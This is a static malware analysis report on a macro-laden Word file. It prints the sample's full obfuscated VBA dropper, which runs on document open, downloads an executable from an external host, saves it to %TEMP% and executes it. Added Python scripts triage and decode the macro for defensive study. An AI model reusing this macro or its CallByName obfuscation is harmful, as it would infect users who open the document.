Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0158105354f139e5…

MALICIOUS

Office (OLE)

Size: 61.5 KB
Created: 2016-05-05 00:39:00
Authoring application: Microsoft Office Word
First seen: 2018-01-23
MD5: daea7636d67a9b94f7ae8dad25ac119d
SHA-1: 62dc3e4f8f05d9590d7d2d81725277ce0a5be7e9
SHA-256: 0158105354f139e587869d6239c4333ebfb1254a3bdf6b33efce27e9fa8e5083
Risk score: 330

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros, including a Document_Open handler, so the code runs as soon as the document is opened with macros enabled. No macro calls Shell() directly: every COM member is invoked through CallByName, and the member names are built at run time by sTuot.oBEYXCxNn, which strips a junk alphabet from an obfuscated literal. Decoding those literals with that same routine yields Open/Send/ResponseBody on MSXML2.ServerXMLHTTP.6.0, Type/Open/Write/SaveToFile/Close on ADODB.Stream and Environment/Exec on WScript.Shell: the macro issues an HTTP GET to hxxp://draw[.]tunnelflight[.]com/assets/b022469f/jui/css/base/word.exe, writes the response body to %TEMP%/5c7de1700b.exe and starts it with WshShell.Exec. This is a download-and-execute dropper, consistent with the ClamAV detection Doc.Dropper.Donoff-5743530-0. The analysis is static, so the payload was not retrieved and its nature is unknown; treat the URL and the drop path as indicators rather than fetching them.

Heuristics (10)

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Public Function fjqQSV() As Object
    Set fjqQSV = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function SvpiLmWn() As Object
    Set SvpiLmWn = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub cUCAEEgFNo(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String)
    CallByName GibAmKCS, PAGGVIvQOW, 1
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    GDLGVHO.DagOitCP
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML namespace URI and is expected in any Office file that carries drawing content; it is not a network indicator for this sample.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4179 bytes
SHA-256: f8de1da55a5041cf1e68faff54f15dc4ea236d7e7314263a32acc9dc32c5a82f
Detection
ClamAV: No threats found (the Doc.Dropper.Donoff signature matched the OLE container at file level, not this decoded source text, so the two results do not contradict each other)
Obfuscation or payload: likely
51 of 95 identifiers look randomly generated (e.g. 'TtGTuTnGneIlqqfqlqiTghTtI'), consistent with name-mangling obfuscation. Note that the quoted example is not a declared name but a dot-separated fragment of the obfuscated URL literal in DEdilmpBeI, so the tokenizer counted string contents as well as identifiers; the ratio is still a useful signal, but the exact count should not be read as a count of mangled procedure and variable names.
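The two findings above can be reproduced over the extracted source: the auto-execution handler plus execution-token co-occurrence that OLE_VBA_PCODE_AUTOEXEC_EXEC describes (here over source text rather than p-code), and the share of random-looking identifiers. The script below is an added example written for this report, not part of the analysis platform or of oletools. It runs over a constructed snippet assembled from lines of the macro preview and over a constructed benign control; the token lists, the randomness thresholds (vowel ratio, lower-to-upper case flips, uppercase share) and the names triage(), looks_random() and identifiers() are this example's own approximations, so its count will not match the platform's 51 of 95.

```python
"""Static triage of extracted VBA source (added example, not platform code).

Reproduces two report heuristics approximately: an auto-exec handler combined
with execution-capable objects or late-bound calls, and the share of declared
identifiers that look machine-generated.  Token lists and thresholds are this
example's own choices.
"""
import re

# Handlers that run without user interaction once macros are enabled.
AUTOEXEC = {"Document_Open", "AutoOpen", "Auto_Open", "AutoExec",
            "Workbook_Open", "Document_Close", "AutoClose"}

# ProgID prefixes that give a macro network, file-write or process capability.
SUSPICIOUS_PROGIDS = ("WScript.Shell", "Shell.Application", "ADODB.Stream",
                      "MSXML2.ServerXMLHTTP", "MSXML2.XMLHTTP", "Microsoft.XMLHTTP")

PROC_RE = re.compile(r"^(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.M)
PARAM_RE = re.compile(r"\b(?:ByVal|ByRef)\s+(\w+)")
MODULE_RE = re.compile(r'VB_Name\s*=\s*"(\w+)"')
PROGID_RE = re.compile(r'CreateObject\(\s*"([^"]+)"\s*\)')
VOWELS = set("aeiouAEIOU")

# Constructed input: lines taken from the macro preview in this report.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
GDLGVHO.DagOitCP
End Sub
Attribute VB_Name = "pgkePk"
Public Sub cUCAEEgFNo(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String)
CallByName GibAmKCS, PAGGVIvQOW, 1
End Sub
Attribute VB_Name = "UseSNmxV"
Public Function SvpiLmWn() As Object
Set SvpiLmWn = CreateObject("ADODB.Stream")
End Function
Public Function fjqQSV() As Object
Set fjqQSV = CreateObject("WScript.Shell")
End Function
Public Function NuiIsqp() As Object
Set NuiIsqp = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
'''

# Constructed benign control: a formatting macro with readable names.
BENIGN_VBA = '''Attribute VB_Name = "Module1"
Public Sub FormatReport()
ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''


def identifiers(src):
    """Unique declared names (modules, procedures, parameters) in source order."""
    names = {}
    for rx in (MODULE_RE, PROC_RE, PARAM_RE):
        for m in rx.finditer(src):
            names.setdefault(m.group(1), None)
    return list(names)


def looks_random(name):
    """Name-mangling approximation: in a name of 5+ characters, few vowels,
    two or more lower->upper case flips, or a mostly upper-case spelling."""
    letters = [c for c in name if c.isalpha()]
    if len(name) < 5 or not letters:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    upper_ratio = sum(c.isupper() for c in letters) / len(letters)
    flips = sum(1 for a, b in zip(name, name[1:]) if a.islower() and b.isupper())
    return vowel_ratio <= 0.25 or flips >= 2 or upper_ratio >= 0.6


def triage(src):
    """Findings a reviewer needs to decide whether to look closer."""
    procs = set(PROC_RE.findall(src))
    autoexec = sorted(procs & AUTOEXEC)
    progids = sorted(set(PROGID_RE.findall(src)))
    prefixes = tuple(p.lower() for p in SUSPICIOUS_PROGIDS)
    risky = [p for p in progids if p.lower().startswith(prefixes)]
    late_bound = len(re.findall(r"\bCallByName\b", src))
    names = identifiers(src)
    random_names = [n for n in names if looks_random(n)]
    if autoexec and (risky or late_bound):
        verdict = "suspicious"   # runs on open and can fetch/write/execute
    elif autoexec or risky or late_bound or len(random_names) > len(names) / 2:
        verdict = "review"
    else:
        verdict = "clean"
    return {"autoexec": autoexec, "progids": progids, "risky_progids": risky,
            "callbyname": late_bound,
            "random_identifiers": (len(random_names), len(names)),
            "verdict": verdict}


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(label, triage(src))
```

The co-occurrence rule is deliberately strict about the combination, not the individual tokens: CreateObject("WScript.Shell") alone appears in plenty of legitimate automation, and a Document_Open handler alone is common in templates, but the two together with late-bound CallByName dispatch are what the report's critical and high findings are built on.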
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
GDLGVHO.DagOitCP
End Sub

Attribute VB_Name = "DERkKXt"
Public Function mwTST(ByVal eJwhcQI As String, ByVal bMNLIOrD As Integer) As String
mwTST = Mid(eJwhcQI, bMNLIOrD, 1)
End Function
Public Function VfORleZDVs(ByVal eJwhcQI As String, ByVal BhfgmELfI As String) As Boolean
VfORleZDVs = InStr(1, eJwhcQI, BhfgmELfI)
End Function

Attribute VB_Name = "pgkePk"
Public Sub cUCAEEgFNo(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String)
CallByName GibAmKCS, PAGGVIvQOW, 1
End Sub
Public Sub WUpxwfwo(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String, ByVal PQvtaMs As Variant)
CallByName GibAmKCS, PAGGVIvQOW, 1, PQvtaMs
End Sub
Public Sub uCNioOdeal(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String, ByVal VgdFEocnDJ As Variant, ByVal YmqteatJ As Variant)
CallByName GibAmKCS, PAGGVIvQOW, 1, VgdFEocnDJ, YmqteatJ
End Sub
Public Function vNISuZNc(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String, ByVal PQvtaMs As String) As Variant
Set vNISuZNc = CallByName(GibAmKCS, PAGGVIvQOW, 2, PQvtaMs)
End Function
Public Function SBHyBnYAg(ByVal GibAmKCS As Object, ByVal IrLsCCZ As String) As Variant
SBHyBnYAg = CallByName(GibAmKCS, IrLsCCZ, 2)
End Function
Public Sub jucnMua(ByVal GibAmKCS As Object, ByVal IrLsCCZ As String, ByVal oMAwTnDn As Variant)
CallByName GibAmKCS, IrLsCCZ, 4, oMAwTnDn
End Sub

Attribute VB_Name = "GDLGVHO"
Public Sub DagOitCP()
cfgaEwFw
End Sub
Private Sub cfgaEwFw()
On Error GoTo zpSVHKAFTS
qTCFusAo DEdilmpBeI, ZMnLs
wAdvZvBBu ZMnLs
Exit Sub
zpSVHKAFTS:
End Sub
Private Sub qTCFusAo(ByVal IZTSUhsNtn As String, ByVal RvtvjE As String)
Set NYAeuFMjq = UseSNmxV.NuiIsqp
NYAeuFMjq.Open sTuot.oBEYXCxNn("GeEupT", "Slupe"), IZTSUhsNtn, False
pgkePk.cUCAEEgFNo NYAeuFMjq, sTuot.oBEYXCxNn("SQelfndf", "Q7fqlJ")
miKacblNvU RvtvjE, pgkePk.SBHyBnYAg(NYAeuFMjq, sTuot.oBEYXCxNn("PRevsxupoxvnsPeuBvPoduyu", "uavPx"))
End Sub
Private Function kpAfw(ByVal aKHWsxq As String) As String
Set EcXUNI = pgkePk.vNISuZNc(UseSNmxV.fjqQSV, sTuot.oBEYXCxNn("EHnH2viHHrwown2m2e2nt2", "H2w"), sTuot.oBEYXCxNn("tPRgjOCgtEtSUS", "jgtU"))
kpAfw = EcXUNI(aKHWsxq)
End Function
Private Function DEdilmpBeI() As String
DEdilmpBeI = sTuot.oBEYXCxNn("hqtItTTpq:T//qGdrTqaIw.TtGTuTnGneIlqqfqlqiTghTtI.IqcoGTm/qaIqssGeGtTsGI/bq0TT22T4G6I9TqfI/IjIuiII/TcqsTs/IqbaIGsIeq/wGGoqrGd.TeGqxeG", "GITq")
End Function
Private Function LfNEGasPkG() As String
LfNEGasPkG = sTuot.oBEYXCxNn("/v5vgcv7dHge1vH7g00gHb.igevxeH", "Hvig")
End Function
Private Function ZMnLs() As String
ZMnLs = kpAfw(sTuot.oBEYXCxNn("TwE.SMqP", ".wSq1s")) & LfNEGasPkG
End Function
Private Sub wAdvZvBBu(ByVal CQSteM As String)
pgkePk.WUpxwfwo UseSNmxV.fjqQSV, sTuot.oBEYXCxNn("Eoxoveoc", "fov"), CQSteM
End Sub
Private Sub miKacblNvU(ByVal RvtvjE As String, ByVal xGduNqg As Variant)
Set jYiywHso = UseSNmxV.SvpiLmWn
pgkePk.jucnMua jYiywHso, sTuot.oBEYXCxNn("PTyDpDea", "urPDFa"), 1
pgkePk.cUCAEEgFNo jYiywHso, sTuot.oBEYXCxNn("O6CpCe6n", "S6C")
pgkePk.WUpxwfwo jYiywHso, sTuot.oBEYXCxNn("0WrCoitOCe", "oV0OC"), xGduNqg
pgkePk.uCNioOdeal jYiywHso, sTuot.oBEYXCxNn("SzaRGvePTzRoFPGilGte", "PRzGt"), RvtvjE, 2
pgkePk.cUCAEEgFNo jYiywHso, sTuot.oBEYXCxNn("SCSlSoTseT", "bST")
End Sub

Attribute VB_Name = "UseSNmxV"
Public Function SvpiLmWn() As Object
Set SvpiLmWn = CreateObject("ADODB.Stream")
End Function
Public Function fjqQSV() As Object
Set fjqQSV = CreateObject("WScript.Shell")
End Function
Public Function NuiIsqp() As Object
Set NuiIsqp = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function

Attribute VB_Name = "sTuot"
Public Function oBEYXCxNn(ByVal zYmqsudP As String, ByVal DzOSyP As String) As String
For bMNLIOrD = 1 To Len(zYmqsudP)
If Not DERkKXt.VfORleZDVs(DzOSyP, DERkKXt.mwTST(zYmqsudP, bMNLIOrD)) Then
oBEYXCxNn = oBEYXCxNn & DERkKXt.mwTST(zYmqsudP, bMNLIOrD)
End If
Next
End Function
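Every COM member in the source above is resolved at run time: sTuot.oBEYXCxNn returns its first argument with every character of the second argument removed, and the result is handed to CallByName. The Python below is an added example, not the sample's own code or the platform's output. It re-implements that routine and applies it to the (literal, junk) pairs copied verbatim from the modules above, so the member names, download URL and drop path are read from the page rather than guessed. The names strip_chars, decode_calls and chain, and the "%TEMP%" placeholder standing in for the value kpAfw reads from the process environment, are this example's own.

```python
"""Decode the macro's string constants without running it (added example).

strip_chars() is a Python equivalent of sTuot.oBEYXCxNn.  The literal pairs
in CALLS, URL_LITERAL and DROP_LITERAL are copied from the extracted source;
everything else (names, the %TEMP% placeholder) belongs to this example.
"""


def strip_chars(text: str, junk: str) -> str:
    """Keep only the characters of text that do not occur in junk.
    The macro's InStr check runs under the default Option Compare Binary,
    so the comparison is case-sensitive here as well."""
    drop = set(junk)
    return "".join(ch for ch in text if ch not in drop)


# (obfuscated literal, junk alphabet) pairs grouped by the object they are
# invoked on.  CallByName call types used on the page: 1 = VbMethod,
# 2 = VbGet, 4 = VbLet.
CALLS = {
    "MSXML2.ServerXMLHTTP.6.0": [
        ("GeEupT", "Slupe"),                    # verb passed to .Open
        ("SQelfndf", "Q7fqlJ"),                 # VbMethod
        ("PRevsxupoxvnsPeuBvPoduyu", "uavPx"),  # VbGet
    ],
    "WScript.Shell": [
        ("EHnH2viHHrwown2m2e2nt2", "H2w"),      # VbGet, next item as argument
        ("tPRgjOCgtEtSUS", "jgtU"),
        ("TwE.SMqP", ".wSq1s"),                 # variable read from that environment
        ("Eoxoveoc", "fov"),                    # VbMethod, drop path as argument
    ],
    "ADODB.Stream": [
        ("PTyDpDea", "urPDFa"),                 # VbLet, value 1 (adTypeBinary)
        ("O6CpCe6n", "S6C"),                    # VbMethod
        ("0WrCoitOCe", "oV0OC"),                # VbMethod, argument = HTTP body
        ("SzaRGvePTzRoFPGilGte", "PRzGt"),      # VbMethod, arguments = path, 2
        ("SCSlSoTseT", "bST"),                  # VbMethod
    ],
}
URL_LITERAL = ("hqtItTTpq:T//qGdrTqaIw.TtGTuTnGneIlqqfqlqiTghTtI.IqcoGTm/qaIqssGeGtTsGI/bq0TT22T4G6I9TqfI/IjIuiII/TcqsTs/IqbaIGsIeq/wGGoqrGd.TeGqxeG", "GITq")
DROP_LITERAL = ("/v5vgcv7dHge1vH7g00gHb.igevxeH", "Hvig")


def decode_calls() -> dict:
    """Decoded member names per object, in the order listed in CALLS."""
    return {obj: [strip_chars(s, junk) for s, junk in pairs]
            for obj, pairs in CALLS.items()}


def payload_url() -> str:
    return strip_chars(*URL_LITERAL)


def drop_path() -> str:
    # kpAfw reads TEMP from the process environment at run time; "%TEMP%"
    # is a placeholder for that value (assumption of this example).
    return "%TEMP%" + strip_chars(*DROP_LITERAL)


def defang(url: str) -> str:
    """Report-safe spelling of an indicator (hxxp, bracketed dots)."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def chain() -> list:
    """GDLGVHO.cfgaEwFw as a readable call sequence built from decoded names."""
    c = decode_calls()
    http, wsh, stm = c["MSXML2.ServerXMLHTTP.6.0"], c["WScript.Shell"], c["ADODB.Stream"]
    path = drop_path()
    return [
        f'path = WshShell.{wsh[0]}("{wsh[1]}")("{wsh[2]}") & "{strip_chars(*DROP_LITERAL)}"',
        f'http.Open "{http[0]}", "{payload_url()}", False',
        f"http.{http[1]}",
        f"body = http.{http[2]}",
        f"stream.{stm[0]} = 1",
        f"stream.{stm[1]}",
        f"stream.{stm[2]} body",
        f'stream.{stm[3]} "{path}", 2',
        f"stream.{stm[4]}",
        f'WshShell.{wsh[3]} "{path}"',
    ]


if __name__ == "__main__":
    for step in chain():
        print(step)
    print("IOC:", defang(payload_url()))
```

Running it prints the reconstructed sequence: the macro resolves %TEMP%, issues a synchronous GET for word.exe, writes the ResponseBody through a binary ADODB.Stream to %TEMP%/5c7de1700b.exe (SaveToFile's second argument 2 is adSaveCreateOverWrite, so an existing file is replaced) and launches it with WshShell.Exec. The decoded URL and drop path are indicators to record and block; the payload itself was not retrieved by this static analysis, so nothing here says what word.exe does.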